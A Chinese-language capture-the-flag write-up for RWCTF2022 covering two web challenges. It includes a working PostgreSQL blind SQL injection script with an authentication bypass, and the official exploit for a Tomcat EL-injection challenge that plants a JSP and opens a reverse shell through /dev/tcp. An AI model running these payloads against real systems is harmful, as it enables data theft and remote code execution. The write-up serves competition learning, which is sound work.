RWCTF2022

赶紧学习

Hack into Skynet

登录哪里非常明显的逻辑问题,可以任意密码登录,username置空就行

之后就可以在name参数注入了

注入还是比较好测的,主要是我测了下%00居然也可以在pgsql当注释符,做比赛的时候才知道。注入就比较简单了,我观察到像是一种正则匹配的规则,但不是纯文本的正则匹配。所以说尝试换一下注入的位置,试了下在offest这里可以绕

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
import string
s=string.digits+string.ascii_letters+r"${}-_"

burp0_url = "http://47.242.21.212:8081/"
burp0_cookies = {"SessionId": "23d96ab50b7215421dd1c101be70d2e1"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://47.242.21.212:8081", "Connection": "close", "Referer": "http://47.242.21.212:8081/", "Upgrade-Insecure-Requests": "1", "Pragma": "no-cache", "Cache-Control": "no-cache"}

flag=''
for i in range(len(flag)+1,60):
	print(i)
	for j in s:
		# SELECT string_agg(table_name,'') FROM information_schema.tables 
		# current_setting('is_superuser')
		# data="(SELECT string_agg(table_name,'') FROM information_schema.tables)"
		data = "(select secret_key from target_credentials where account='skynet')"
		burp0_data = {"name": f"s' or 1::BOOLEAN OFFSET 0|(left({data},{i})='{flag+j}')::integer\x00"}
		print(burp0_data)
		res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
		if 'john.connor' in res.text:
			flag =flag+j
			break
# PostgreSQL 13.5 on x86
# skynet eb0f4c3b032e72d6fdf908dfcfe4836c

Desperate Cat

完全不会,看了一会等于什么都没做

赛后看到wp,非常的顶,而且有几种做法

预期解,这里是官方的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python3

import sys
import time
import requests

PROXIES = None

if __name__ == '__main__':
    target_url = sys.argv[1]    # e.g. http://47.243.235.228:39465/
    reverse_shell_host = sys.argv[2]
    reverse_shell_port = sys.argv[3]

    el_payload = r"""${pageContext.servletContext.classLoader.resources.context.manager.pathname=param.a}
${sessionScope[param.b]=param.c}
${pageContext.servletContext.classLoader.resources.context.reloadable=true}
${pageContext.servletContext.classLoader.resources.context.parent.appBase=param.d}"""
    reverse_shell_jsp_payload = r"""<%Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "sh -i >& /dev/tcp/""" + reverse_shell_host + "/" + reverse_shell_port + r""" 0>&1"});%>"""
    r = requests.post(url=f'{target_url}/export',
                      data={
                          'dir': '',
                          'filename': 'a.jsp',
                          'content': el_payload,
                      },
                      proxies=PROXIES)
    shell_path = r.text.strip().split('/')[-1]
    shell_url = f'{target_url}/export/{shell_path}'
    r2 = requests.post(url=shell_url,
                       data={
                           'a': '/tmp/session.jsp',
                           'b': 'voidfyoo',
                           'c': reverse_shell_jsp_payload,
                           'd': '/',
                       },
                       proxies=PROXIES)
    r3 = requests.post(url=f'{target_url}/export',
                       data={
                           'dir': './WEB-INF/lib/',
                           'filename': 'a.jar',
                           'content': 'a',
                       },
                       proxies=PROXIES)
    time.sleep(10)  # wait a while
    r4 = requests.get(url=f'{target_url}/tmp/session.jsp', proxies=PROXIES)

基础还是很重要的,我完全不知道可以用el干这么骚的事情,我看那么多控制字符都没了都绝望好久了。

简单解释一下1

上面那段el首先是控制了一个文件内容,更改了appBase,热加载打开,然后触发

还有一种非预期还在学习中